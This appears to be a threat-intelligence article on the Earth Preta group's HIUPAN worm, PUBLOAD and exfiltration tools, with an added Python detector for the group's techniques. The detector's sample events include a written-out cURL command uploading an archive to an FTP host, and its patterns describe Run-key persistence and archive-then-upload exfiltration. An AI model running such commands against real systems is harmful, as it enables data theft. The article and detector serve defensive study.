Earth Preta, a notorious threat group, has been observed upgrading its attacks to distribute malware via removable drives, employing a variant of the worm HIUPAN. This campaign targets specific countries and sectors in the Asia-Pacific region, utilizing a combination of tools and techniques to achieve rapid deployment and data exfiltration.
Earth Preta Worm-based Attack Progression
Researchers from Trend Micro state that the HIUPAN worm most likely serves as a key component of Earth Preta’s attack chain, allowing the group to propagate PUBLOAD into targets’ networks via removable drives. HIUPAN’s configuration file contains the essential information for its propagation and watchdog functions, making it easier to set up and execute. Once launched, HIUPAN installs a copy of itself on the victim’s system, creates an autorun registry entry to maintain persistence, and modifies registry values to hide its presence.
PUBLOAD, the main control tool, collects system information, maps the network, and facilitates the delivery of additional tools, including FDMTP and PTSOCKET. FDMTP, a newly discovered hacking tool, is used to download and execute malware, while PTSOCKET serves as an exfiltration tool to upload collected data onto a remote server.
While spear-phishing emails were previously used to deliver PUBLOAD, the distribution of the HIUPAN malware through removable drives allows Earth Preta to target a wider range of victims and bypass certain security measures.
The countries that were likely targeted include Myanmar, the Philippines, Vietnam, Singapore, Cambodia and Taiwan, all located in the APAC region. Additionally, the decoy documents predominantly focus on topics related to government, particularly foreign affairs.
The HIUPAN worm variant used in these attacks is easier to configure, with an external config file that contains information for its propagation and watchdog function. HIUPAN’s watcher function periodically checks for the presence of removable and hot-pluggable drives, and if found, it will propagate to the removable drive, ensuring the continued spread of the malware.
PUBLOAD uses WinRAR to collect data from targeted files, encrypting and uploading the archived files to an attacker-owned FTP site using cURL. Alternatively, PTSOCKET can be used for exfiltration, transferring files to the attackers in multi-thread mode. Earth Preta’s collection and exfiltration activities are designed to be rapid and stealthy, making it essential for security teams to stay abreast of these evolving tactics.
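The two behaviours described above (HIUPAN’s autorun persistence from a removable drive, and PUBLOAD’s WinRAR-then-cURL FTP exfiltration) can be turned into endpoint detection logic. The following is an added example, not code from Trend Micro or from the malware analysis; it runs over constructed Sysmon-style events, and the system-drive letter, the correlation window and the archiver/cURL patterns are assumptions to be tuned per environment.

```python
import re
from typing import Dict, List

# Constructed, flattened Sysmon-style events for the example; not real telemetry.
SAMPLE_EVENTS: List[Dict] = [
    {"ts": 100, "host": "ws1", "type": "process", "image": r"E:\docs\report.exe",
     "cmd": r"E:\docs\report.exe"},
    {"ts": 101, "host": "ws1", "type": "registry", "image": r"E:\docs\report.exe",
     "key": r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run\svchelper"},
    {"ts": 400, "host": "ws1", "type": "process", "image": r"C:\Users\u\AppData\Roaming\t\rar.exe",
     "cmd": r"rar.exe a -ep1 -r C:\Users\u\AppData\Local\Temp\out.rar C:\Users\u\Documents\*.docx"},
    {"ts": 430, "host": "ws1", "type": "process", "image": r"C:\Windows\System32\curl.exe",
     "cmd": r"curl.exe -T C:\Users\u\AppData\Local\Temp\out.rar ftp://203.0.113.10/up/ -u usr:pw"},
    # Benign: an admin archiving logs with WinRAR and no follow-up upload.
    {"ts": 900, "host": "ws2", "type": "process", "image": r"C:\Program Files\WinRAR\Rar.exe",
     "cmd": r"Rar.exe a D:\backup\logs.rar C:\inetpub\logs\*.log"},
]

RUN_KEY_RE = re.compile(r"\\CurrentVersion\\Run\\", re.IGNORECASE)
ARCHIVER_RE = re.compile(r"\\(win)?rar\.exe$", re.IGNORECASE)
CURL_FTP_RE = re.compile(r"curl(\.exe)?\b.*\bftp://", re.IGNORECASE)
SYSTEM_DRIVE = "C:"       # assumption: the OS volume; anything else is treated as removable/non-system
EXFIL_WINDOW_SECS = 300   # assumption: archive-then-upload correlation window

def detect_earth_preta_ttps(events: List[Dict]) -> List[Dict]:
    """Return alerts for (1) a Run-key write by a binary executing from a non-system
    volume, matching HIUPAN's autorun persistence from a removable drive, and
    (2) a rar.exe run followed on the same host by a cURL FTP upload, matching
    PUBLOAD's collection and exfiltration pattern."""
    alerts: List[Dict] = []
    last_archive: Dict[str, int] = {}  # host -> timestamp of the latest rar.exe execution
    for ev in sorted(events, key=lambda e: e["ts"]):
        host, image = ev["host"], ev.get("image", "")
        if (ev["type"] == "registry" and RUN_KEY_RE.search(ev.get("key", ""))
                and not image.upper().startswith(SYSTEM_DRIVE)):
            alerts.append({"rule": "runkey_from_removable", "host": host, "ts": ev["ts"], "image": image})
        elif ev["type"] == "process":
            if ARCHIVER_RE.search(image):
                last_archive[host] = ev["ts"]
            elif (CURL_FTP_RE.search(ev.get("cmd", "")) and host in last_archive
                    and ev["ts"] - last_archive[host] <= EXFIL_WINDOW_SECS):
                alerts.append({"rule": "rar_then_curl_ftp", "host": host, "ts": ev["ts"], "cmd": ev["cmd"]})
    return alerts

if __name__ == "__main__":
    for alert in detect_earth_preta_ttps(SAMPLE_EVENTS):
        print(alert)
```

On the sample events this yields two alerts for ws1 (the Run-key write from E: and the rar-then-cURL upload) and none for the benign archiving on ws2.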
Earth Preta Adaptations
Earth Preta has shown significant advancements in its malware deployment and attack strategies, particularly in campaigns targeting government entities in the APAC region, including the military, police, foreign affairs agencies, welfare agencies, the executive branch, and education.
The use of tools such as FDMTP and PTSOCKET significantly enhances Earth Preta’s control and exfiltration capabilities, while an earlier campaign in June demonstrated the use of multi-stage downloaders (from DOWNBAIT to PLUGX) and the exploitation of Microsoft’s cloud services for data exfiltration.
The quick turnover of decoy documents and malware samples on the WebDAV server hosted at 16[.]162[.]188[.]93 suggests that Earth Preta is executing highly targeted and time-sensitive operations, with a focus on specific countries and industries within the APAC region, where researchers believe the group will remain active.